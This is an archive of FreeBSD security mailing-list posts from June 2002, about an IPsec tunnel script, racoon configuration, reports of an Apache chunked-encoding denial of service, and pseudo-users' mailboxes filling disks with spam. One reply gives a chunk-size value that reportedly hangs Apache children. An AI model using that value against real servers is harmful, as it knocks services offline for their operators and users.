Jun 2002 07:47:54 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5LClsM29289; Fri, 21 Jun 2002 07:47:54 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5LClpR29282; Fri, 21 Jun 2002 07:47:51 -0500 (CDT) Message-ID: <3D132077.4B8FBB3D@centtech.com> Date: Fri, 21 Jun 2002 07:47:51 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: cjclark@alum.mit.edu Cc: security@freebsd.org Subject: Re: Configuring sainfo in racoon(8) References: <20020618130547.A11688@blossom.cjclark.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, I'm no expert on this, but the way I have my tunnels set up is something like this (this is a script on one side of the tunnel). VNNAME=tunnelname GWAY=192.168.10.17 NMASK=255.255.255.240 HNET=192.168.10.16/28 IFACE=gif0 # DO NOT EDIT BELOW THIS POINT # EXTIP=`cat /usr/local/etc/vpn/$VNNAME-extip` gifconfig $IFACE delete gifconfig $IFACE 200.200.200.200 $EXTIP logger -t $VNNAME Interface $IFACE has been brought up. ifconfig $IFACE inet 10.10.10.39 $GWAY netmask 255.255.255.255 logger -t $VNNAME Configured $IFACE. route add -net $HNET $GWAY > /dev/null 2>&1 route add $HNET $GWAY > /dev/null 2>&1 route add 10.10.10.39 $GWAY > /dev/null 2>&1 logger -t $VNNAME Added network route for $IFACE setkey -c << EOF spddelete 10.10.10.0/24 $HNET any -P out; spddelete $HNET 10.10.10.0/24 any -P in; spddelete 10.20.0.0/16 $HNET any -P out; spddelete $HNET 10.20.0.0/16 any -P in; spdadd 10.10.10.0/24 $HNET any -P out ipsec esp/tunnel/200.200.200.200-$EXTIP/require; spdadd $HNET 10.10.10.0/24 any -P in ipsec esp/tunnel/$EXTIP-200.200.200.200/require; spdadd 10.20.0.0/16 $HNET any -P out ipsec esp/tunnel/200.200.200.200-$EXTIP/require; spdadd $HNET 10.20.0.0/16 any -P in ipsec esp/tunnel/$EXTIP-200.200.200.200/require; EOF ping -c 5 $GWAY > /dev/null 2>&1 logger -t $VNNAME Finished adding SPDs. Does this help any? Eric "Crist J. Clark" wrote: > I have my SPD set, > > # setkey -c < spdadd 192.168.200.1 192.168.101.0/24 any > -P out ipsec esp/tunnel/192.168.200.1-192.168.100.1/require; > spdadd 192.168.101.0/24 192.168.200.1 any > -P in ipsec esp/tunnel/192.168.100.1-192.168.200.1/require; > EOF -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 8:52:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63]) by hub.freebsd.org (Postfix) with ESMTP id 45C1B37B405 for ; Fri, 21 Jun 2002 08:52:12 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc03.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020621155211.FCC20219.sccrmhc03.attbi.com@blossom.cjclark.org>; Fri, 21 Jun 2002 15:52:11 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g5LFq6JK031126; Fri, 21 Jun 2002 08:52:06 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g5LFq68x031125; Fri, 21 Jun 2002 08:52:06 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Fri, 21 Jun 2002 08:52:05 -0700 From: "Crist J. Clark" To: Eric Anderson Cc: security@freebsd.org Subject: Re: Configuring sainfo in racoon(8) Message-ID: <20020621085205.A31083@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <20020618130547.A11688@blossom.cjclark.org> <3D132077.4B8FBB3D@centtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D132077.4B8FBB3D@centtech.com>; from anderson@centtech.com on Fri, Jun 21, 2002 at 07:47:51AM -0500 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 21, 2002 at 07:47:51AM -0500, Eric Anderson wrote: > Well, I'm no expert on this, but the way I have my tunnels set up is something > like this (this is a script on one side of the tunnel). [snip script] > Does this help any? Thanks, but not really. I'm not using gif(4) interfaces, and my SPD seems to be set up fine. It's the way racoon(8) is [not] working that is confusing me. > "Crist J. Clark" wrote: > > I have my SPD set, > > > > # setkey -c < > spdadd 192.168.200.1 192.168.101.0/24 any > > -P out ipsec esp/tunnel/192.168.200.1-192.168.100.1/require; > > spdadd 192.168.101.0/24 192.168.200.1 any > > -P in ipsec esp/tunnel/192.168.100.1-192.168.200.1/require; > > EOF -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 10:23:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from m-net.arbornet.org (m-net.arbornet.org [209.142.209.161]) by hub.freebsd.org (Postfix) with ESMTP id DD50D37B400 for ; Fri, 21 Jun 2002 10:23:07 -0700 (PDT) Received: from m-net.arbornet.org (localhost [127.0.0.1]) by m-net.arbornet.org (8.12.3/8.11.2) with ESMTP id g5LHN4u7076972; Fri, 21 Jun 2002 13:23:04 -0400 (EDT) (envelope-from polytarp@m-net.arbornet.org) Received: from localhost (polytarp@localhost) by m-net.arbornet.org (8.12.3/8.12.3/Submit) with ESMTP id g5LHN4EL076969; Fri, 21 Jun 2002 13:23:04 -0400 (EDT) Date: Fri, 21 Jun 2002 13:23:04 -0400 (EDT) From: pgreen To: cjclark@alum.mit.edu Cc: Eric Anderson , Subject: Re: Configuring sainfo in racoon(8) In-Reply-To: <20020621085205.A31083@blossom.cjclark.org> Message-ID: <20020621132221.H76942-100000@m-net.arbornet.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It's Christ! h ail m a ry praise the lord To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 11:25:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from thor.birkenwald.de (thor.birkenwald.de [195.143.230.218]) by hub.freebsd.org (Postfix) with ESMTP id 873E437B401 for ; Fri, 21 Jun 2002 11:25:34 -0700 (PDT) Received: by thor.birkenwald.de (Postfix, from userid 1000) id 8B6261ABF4; Fri, 21 Jun 2002 20:25:32 +0200 (CEST) Date: Fri, 21 Jun 2002 20:25:32 +0200 From: Bernhard Schmidt To: Maxim Kozin Cc: freebsd-security@freebsd.org Subject: Re: Apache expoit? Message-ID: <20020621182532.GA50708@thor.birkenwald.de> References: <2147483647.1024500409@[192.168.4.154]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 20, 2002 at 02:44:35PM +0400, Maxim Kozin wrote: > "Exploit" from this letter tested on FreeBSD 4.6-RELEASE with different > version apache: > 1) 2.0.36 > 2) 2.0.39 > 3) 1.3.26 > In case of 1) and (!) 2) httpd child died with "child out of swap > space". > So, in 2.0.39 still exists DoS. JFTR, same here on FreeBSD 4.5-RELEASE and 4.6-RELEASE with Apache 2.0.39 straight from /usr/ports/www/apache2. Anyone heard something from the apache.org people about this? -- bye bye Bernhard To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 11:57:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from musique.teaser.net (musique.teaser.net [213.91.2.11]) by hub.freebsd.org (Postfix) with ESMTP id C771637B40B for ; Fri, 21 Jun 2002 11:57:31 -0700 (PDT) Received: from roadrunner.rominet.net (ATuileries-109-1-2-231.abo.wanadoo.fr [80.13.122.231]) by musique.teaser.net (Postfix) with ESMTP id 8C94972524 for ; Fri, 21 Jun 2002 20:57:30 +0200 (CEST) Received: by roadrunner.rominet.net (Postfix, from userid 1000) id 932028162; Fri, 21 Jun 2002 20:57:29 +0200 (CEST) Date: Fri, 21 Jun 2002 20:57:29 +0200 From: Alain Thivillon To: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? Message-ID: <20020621185729.GG9492@roadrunner.rominet.net> References: <20020620201509.GC56227@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.24i X-Organization: Rominet Networks Inc. X-Operating-System: FreeBSD 4.6-RC Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > It isn't a very serious DoS though. My first try on FreeBSD 4.x with chunk size = 80000000 put httpd child in an endless loop. 10 or 20 requests will probably result in an unusable system (loop continues after client connection is closed). -- Nom d'un chat de nom d'un chat ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 17: 1:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 96B2237B405 for ; Fri, 21 Jun 2002 17:01:24 -0700 (PDT) Received: (from root@localhost) by lariat.org (8.9.3/8.9.3) id SAA26010 for security@freebsd.org; Fri, 21 Jun 2002 18:01:16 -0600 (MDT) Date: Fri, 21 Jun 2002 18:01:16 -0600 (MDT) From: Brett Glass Message-Id: <200206220001.SAA26010@lariat.org> To: security@freebsd.org Subject: Possible security liability: Filling disks with junk or spam Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Two years ago, at BSDCon, I reported on a form of abuse known as a "Rumplestiltskin attack," in which an attacker guessed names in rapid succession so as to find valid e-mail addresses to spam. Well, as it turns out, one doesn't need to do this to find addresses on FreeBSD systems that can be filled with mail. /etc/passwd contains quite a few pseudo-users which, if mailed, cause the mail to be stored on the disk as if it were addressed to a real user. No one may ever read it, but it's possible to fill the partition and thereby wreak havoc. A client recently called me in puzzlement, saying that his system was misbehaving, and it turned out that this was what had happened. The address "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd never used or hosted netnews, and so had no need for the pseudo-user. But that pseudo-user was there by default, and the system dutifully created a mailbox for him/her/it when the very first spam arrived. It started growing by leaps and bounds until it was -- I kid you not! -- several hundred megabytes in size. At which point the partition ran out of room. It seems to me that pseudo-users should be non-mailable, just as a basic security policy. Ideas for the best way to implement this in the default install? --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 17:14:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from edgemaster.zombie.org (ip68-13-69-9.om.om.cox.net [68.13.69.9]) by hub.freebsd.org (Postfix) with ESMTP id A554337B40D for ; Fri, 21 Jun 2002 17:14:35 -0700 (PDT) Received: by edgemaster.zombie.org (Postfix, from userid 1001) id 72B9266B04; Fri, 21 Jun 2002 19:14:35 -0500 (CDT) Date: Fri, 21 Jun 2002 19:14:35 -0500 From: Sean Kelly To: Brett Glass Cc: security@freebsd.org Subject: Re: Possible security liability: Filling disks with junk or spam Message-ID: <20020622001435.GA99704@edgemaster.zombie.org> References: <200206220001.SAA26010@lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206220001.SAA26010@lariat.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett Glass wrote: ... > A client recently called me in puzzlement, saying that his system was > misbehaving, and it turned out that this was what had happened. The address > "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd > never used or hosted netnews, and so had no need for the pseudo-user. But that > pseudo-user was there by default, and the system dutifully created a mailbox > for him/her/it when the very first spam arrived. It started growing by leaps > and bounds until it was -- I kid you not! -- several hundred megabytes in > size. At which point the partition ran out of room. > > It seems to me that pseudo-users should be non-mailable, just as a basic > security policy. Ideas for the best way to implement this in the default > install? If you look at /usr/src/etc/mail/aliases, you'll see that pseudo-users are mapped to root. I also see news in there: news: root usenet: news It seems to me that the best way to prevent such things happening would be to keep your aliases files up to date. Use mergemaster and also maintain the file for any pseudo-users you may add. At some point, the administrator has to become responsible for the system they administer. -- Sean Kelly | PGP KeyID: 77042C7B smkelly@zombie.org | http://www.zombie.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 17:34:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10104.mail.yahoo.com (web10104.mail.yahoo.com [216.136.130.54]) by hub.freebsd.org (Postfix) with SMTP id 7625137B408 for ; Fri, 21 Jun 2002 17:34:44 -0700 (PDT) Message-ID: <20020622003444.66667.qmail@web10104.mail.yahoo.com> Received: from [68.5.49.41] by web10104.mail.yahoo.com via HTTP; Fri, 21 Jun 2002 17:34:44 PDT Date: Fri, 21 Jun 2002 17:34:44 -0700 (PDT) From: twig les Subject: Re: Possible security liability: Filling disks with junk or spam To: Sean Kelly , Brett Glass Cc: security@freebsd.org In-Reply-To: <20020622001435.GA99704@edgemaster.zombie.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Would it be viable to un-map the psuedo-users or would that break something? --- Sean Kelly wrote: > On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett > Glass wrote: > ... > > A client recently called me in puzzlement, saying > that his system was > > misbehaving, and it turned out that this was what > had happened. The address > > "news@victim.com" had somehow wound up on quite a > few spammers' lists. He'd > > never used or hosted netnews, and so had no need > for the pseudo-user. But that > > pseudo-user was there by default, and the system > dutifully created a mailbox > > for him/her/it when the very first spam arrived. > It started growing by leaps > > and bounds until it was -- I kid you not! -- > several hundred megabytes in > > size. At which point the partition ran out of > room. > > > > It seems to me that pseudo-users should be > non-mailable, just as a basic > > security policy. Ideas for the best way to > implement this in the default > > install? > > If you look at /usr/src/etc/mail/aliases, you'll see > that pseudo-users are > mapped to root. I also see news in there: > news: root > > usenet: news > > > It seems to me that the best way to prevent such > things happening would be > to keep your aliases files up to date. Use > mergemaster and also maintain > the file for any pseudo-users you may add. At some > point, the > administrator has to become responsible for the > system they administer. > > -- > Sean Kelly | PGP KeyID: 77042C7B > smkelly@zombie.org | http://www.zombie.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 18: 6:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from router.drapple.com (12-225-1-20.client.attbi.com [12.225.1.20]) by hub.freebsd.org (Postfix) with ESMTP id 8E74D37B405 for ; Fri, 21 Jun 2002 18:06:41 -0700 (PDT) Received: from work.drapple.com (work [192.168.1.10]) by router.drapple.com (8.9.3/8.9.3) with ESMTP id SAA07774; Fri, 21 Jun 2002 18:07:50 -0700 (PDT) (envelope-from mark@work.drapple.com) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <20020622003444.66667.qmail@web10104.mail.yahoo.com> Date: Fri, 21 Jun 2002 18:06:34 -0700 (PDT) From: Mark Hartley To: twig les Subject: Re: Possible security liability: Filling disks with junk or spam Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 22-Jun-02 twig les wrote: > Would it be viable to un-map the psuedo-users or would > that break something? > If you don't want to forward their messages to root (which I think is the best way), you could always simply edit the aliases file and put the following lines in: bin: /dev/null news: /dev/null (and so on for each one) Depends on how the admin wants to handle it. Mark. > > --- Sean Kelly wrote: >> On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett >> Glass wrote: >> ... >> > A client recently called me in puzzlement, saying >> that his system was >> > misbehaving, and it turned out that this was what >> had happened. The address >> > "news@victim.com" had somehow wound up on quite a >> few spammers' lists. He'd >> > never used or hosted netnews, and so had no need >> for the pseudo-user. But that >> > pseudo-user was there by default, and the system >> dutifully created a mailbox >> > for him/her/it when the very first spam arrived. >> It started growing by leaps >> > and bounds until it was -- I kid you not! -- >> several hundred megabytes in >> > size. At which point the partition ran out of >> room. >> > >> > It seems to me that pseudo-users should be >> non-mailable, just as a basic >> > security policy. Ideas for the best way to >> implement this in the default >> > install? >> >> If you look at /usr/src/etc/mail/aliases, you'll see >> that pseudo-users are >> mapped to root. I also see news in there: >> news: root >> >> usenet: news >> >> >> It seems to me that the best way to prevent such >> things happening would be >> to keep your aliases files up to date. Use >> mergemaster and also maintain >> the file for any pseudo-users you may add. At some >> point, the >> administrator has to become responsible for the >> system they administer. >> >> -- >> Sean Kelly | PGP KeyID: 77042C7B >> smkelly@zombie.org | http://www.zombie.org >> > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 19: 1:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by hub.freebsd.org (Postfix) with ESMTP id 0AAA237B404 for ; Fri, 21 Jun 2002 19:01:45 -0700 (PDT) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g5M21ZOa040442; Fri, 21 Jun 2002 22:01:35 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g5M21Z63040439; Fri, 21 Jun 2002 22:01:35 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Fri, 21 Jun 2002 22:01:35 -0400 (EDT) From: Trevor Johnson To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam In-Reply-To: <200206220001.SAA26010@lariat.org> Message-ID: <20020621210455.F13586-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > A client recently called me in puzzlement, saying that his system was > misbehaving, and it turned out that this was what had happened. The address > "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd > never used or hosted netnews, and so had no need for the pseudo-user. But that > pseudo-user was there by default, and the system dutifully created a mailbox > for him/her/it when the very first spam arrived. It started growing by leaps > and bounds until it was -- I kid you not! -- several hundred megabytes in > size. At which point the partition ran out of room. > > It seems to me that pseudo-users should be non-mailable, just as a basic > security policy. Ideas for the best way to implement this in the default > install? My reading of the RFCs (excerpts follow) is that the "news" and "usenet" addresses should receive mail when NNTP is in use. It seems like a task for the sysadmin. How about comments in /etc/inetd.conf along the lines of: # Enable e-mail to the "ftp" address if you turn this on (RFC 2142). #ftp stream tcp6 nowait root /usr/libexec/ftpd ftpd -l # # Enable e-mail to the "uucp" address if you turn this on (RFC 2142). #uucpd stream tcp nowait root /usr/libexec/uucpd uucpd # # Enable e-mail to "usenet" and "news" addresses if you turn this on (RFC 2142). #nntp stream tcp nowait usenet /usr/libexec/nntpd nntpd with the addresses commented out in /etc/aliases? Running "df" every few months wouldn't hurt, of course. 6.3. RESERVED ADDRESS It often is necessary to send mail to a site, without know- ing any of its valid addresses. For example, there may be mail system dysfunctions, or a user may wish to find out a person's correct address, at that site. --RFC 822 (URL:ftp://ftp.isi.edu/in-notes/rfc822.txt) 5.2.7 RCPT Command: RFC-821 Section 4.1.1 A host that supports a receiver-SMTP MUST support the reserved mailbox "Postmaster". --RFC 1123 (URL:ftp://ftp.isi.edu/in-notes/rfc1123.txt) Various Internet documents have specified mailbox names to be used when reaching the operators of the new service; for example, [RFC822 6.3, C.6] requires the presence of a mailbox name on all hosts that have an SMTP server. Other protocols have defacto standards for well known mailbox names, such as for NNTP (see [RFC977]), and for HTTP (see [HTTP]). Defacto standards also exist for well known mailbox names which have nothing to do with a particular protocol, e.g., and . [...] 5. SUPPORT MAILBOX NAMES FOR SPECIFIC INTERNET SERVICES For major Internet protocol services, there is a mailbox defined for receiving queries and reports. (Synonyms are included, here, due to their extensive installed base.) MAILBOX SERVICE SPECIFICATIONS ----------- ---------------- --------------------------- POSTMASTER SMTP [RFC821], [RFC822] HOSTMASTER DNS [RFC1033-RFC1035] USENET NNTP [RFC977] NEWS NNTP Synonym for USENET WEBMASTER HTTP [RFC 2068] WWW HTTP Synonym for WEBMASTER UUCP UUCP [RFC976] FTP FTP [RFC959] --RFC 2142 (URL:ftp://ftp.isi.edu/in-notes/rfc2142.txt) -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 19:13: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns3.ideathcare.com (mail.allneo.com [216.185.96.68]) by hub.freebsd.org (Postfix) with SMTP id BF86237B407 for ; Fri, 21 Jun 2002 19:12:50 -0700 (PDT) Received: (qmail 73368 invoked by uid 85); 22 Jun 2002 02:17:04 -0000 Received: from jps@funeralexchange.com by ns3.ideathcare.com with qmail-scanner-1.03 (uvscan: v4.1.40/v4121. . Clean. Processed in 0.170925 secs); 22 Jun 2002 02:17:04 -0000 Received: from unknown (HELO funeralexchange.com) (216.185.99.194) by mail.allneo.com with SMTP; 22 Jun 2002 02:17:04 -0000 Received: from 66.171.47.179 (SquirrelMail authenticated user jps@funeralexchange.com) by webmail.allneo.com with HTTP; Fri, 21 Jun 2002 21:13:34 -0500 (CDT) Message-ID: <4086.66.171.47.179.1024712014.squirrel@webmail.allneo.com> Date: Fri, 21 Jun 2002 21:13:34 -0500 (CDT) Subject: Re: Possible security liability: Filling disks with junk or spam From: To: In-Reply-To: References: <20020622003444.66667.qmail@web10104.mail.yahoo.com> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: , X-Mailer: SquirrelMail (version 1.2.6) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Any competent admin would have these accounts already routed to another account preferably off the server or send them to /dev/null as Mark had suggested. I myself edit the aliases file to mark the accounts with a hostname (i.e. Root Server1 ) so I know which server its coming from and then forward all the mail to my personal account to review. From there you can have your mail client sort it out for you. I prefer not to delete ANY mail that is sent to me without myself looking it over. You can prevent lots of upcoming problems this way. Thanks Jeremy Suo-Anttila jps@funeralexchange.com > > On 22-Jun-02 twig les wrote: >> Would it be viable to un-map the psuedo-users or would >> that break something? >> > > If you don't want to forward their messages to root (which I think is > the best way), you could always simply edit the aliases file and put > the following lines in: > > bin: /dev/null > news: /dev/null > > (and so on for each one) > > > Depends on how the admin wants to handle it. > > > Mark. > > >> >> --- Sean Kelly wrote: >>> On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett >>> Glass wrote: >>> ... >>> > A client recently called me in puzzlement, saying >>> that his system was >>> > misbehaving, and it turned out that this was what >>> had happened. The address >>> > "news@victim.com" had somehow wound up on quite a >>> few spammers' lists. He'd >>> > never used or hosted netnews, and so had no need >>> for the pseudo-user. But that >>> > pseudo-user was there by default, and the system >>> dutifully created a mailbox >>> > for him/her/it when the very first spam arrived. >>> It started growing by leaps >>> > and bounds until it was -- I kid you not! -- >>> several hundred megabytes in >>> > size. At which point the partition ran out of >>> room. >>> > >>> > It seems to me that pseudo-users should be >>> non-mailable, just as a basic >>> > security policy. Ideas for the best way to >>> implement this in the default >>> > install? >>> >>> If you look at /usr/src/etc/mail/aliases, you'll see >>> that pseudo-users are >>> mapped to root. I also see news in there: >>> news: root >>> >>> usenet: news >>> >>> >>> It seems to me that the best way to prevent such >>> things happening would be >>> to keep your aliases files up to date. Use >>> mergemaster and also maintain >>> the file for any pseudo-users you may add. At some >>> point, the >>> administrator has to become responsible for the >>> system they administer. >>> >>> -- >>> Sean Kelly | PGP KeyID: 77042C7B >>> smkelly@zombie.org | http://www.zombie.org >>> >> > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 20:31:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id E19AA37B40C for ; Fri, 21 Jun 2002 20:31:41 -0700 (PDT) Received: from daleco [12.145.236.93] by mail.gbronline.com (SMTPD32-7.10) id AF4027B300F8; Fri, 21 Jun 2002 22:30:08 -0500 Message-ID: <003301c2199d$3ff0c9e0$5dec910c@daleco> From: "Kevin Kinsey, DaleCo, S.P." To: "Brett Glass" Cc: References: <200206220001.SAA26010@lariat.org> Subject: Re: Possible security liability: Filling disks with junk or spam Date: Fri, 21 Jun 2002 22:31:08 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I wrote several paragraphs and deleted them. This may suffice: "Pretty much everything else in this file points to root, so you would do well in either reading root's email of forwarding root's email from here." If your client doesn't do this, maybe that's a bad thing(tm) or maybe it's just your job security... I try to avoid the "When panicked break Glass" bandwagon, but this doesn't compute for me. Kevin Kinsey, DaleCo, S.P. ----- Original Message ----- From: "Brett Glass" To: Sent: Friday, June 21, 2002 7:01 PM Subject: Possible security liability: Filling disks with junk or spam > Two years ago, at BSDCon, I reported on a form of abuse known as a > "Rumplestiltskin attack," in which an attacker guessed names in rapid > succession so as to find valid e-mail addresses to spam. Well, as it turns > out, one doesn't need to do this to find addresses on FreeBSD systems that can > be filled with mail. /etc/passwd contains quite a few pseudo-users which, if > mailed, cause the mail to be stored on the disk as if it were addressed to a > real user. No one may ever read it, but it's possible to fill the partition > and thereby wreak havoc. > > A client recently called me in puzzlement, saying that his system was > misbehaving, and it turned out that this was what had happened. The address > "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd > never used or hosted netnews, and so had no need for the pseudo-user. But that > pseudo-user was there by default, and the system dutifully created a mailbox > for him/her/it when the very first spam arrived. It started growing by leaps > and bounds until it was -- I kid you not! -- several hundred megabytes in > size. At which point the partition ran out of room. > > It seems to me that pseudo-users should be non-mailable, just as a basic > security policy. Ideas for the best way to implement this in the default > install? > > --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 20:36: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id 0303237B410 for ; Fri, 21 Jun 2002 20:35:57 -0700 (PDT) Received: from daleco [12.145.236.93] by mail.gbronline.com (SMTPD32-7.10) id A04527960048; Fri, 21 Jun 2002 22:34:29 -0500 Message-ID: <004301c2199d$dbacf3e0$5dec910c@daleco> From: "Kevin Kinsey, DaleCo, 